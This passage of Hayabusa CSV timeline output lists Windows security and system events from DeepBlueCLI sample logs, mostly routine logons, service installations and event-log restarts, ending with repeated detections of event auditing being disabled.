Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:30:25.009 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:30:40.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:21:46.785 +00:00,IE10Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:47.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:23:13.147 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:13.240 
+00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:19.075 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:30.884 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:31.757 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:33.349 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:11.865 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:17.909 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock 
Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:18.237 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:19.969 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:20.281 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:20.452 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:23.245 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:30.249 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand 
start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:31.310 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:33.925 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:34.362 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:36.015 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:38.153 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:38.823 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto 
start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:39.011 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:41.647 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:44.783 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:53.788 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:04.605 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:05.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:51.420 +00:00,IE10Win7,4624,info,,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:53.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:26:40.560 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:26:42.000 +00:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-28 15:46:09.645 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:10.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:48:19.456 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 
0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:48:20.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:33.911 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:34.426 +00:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 
0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:34.426 +00:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:20.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:47:20.053 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 
0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:36.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:47:36.671 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:48:31.000 +00:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:48:31.289 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:38.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:49:38.281 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:42.406 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:28:28.043 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:28:38.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:29:27.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:29:27.609 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4624,info,,Logon Type 2 - 
Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:32:23.580 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:32:23.595 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 
+00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 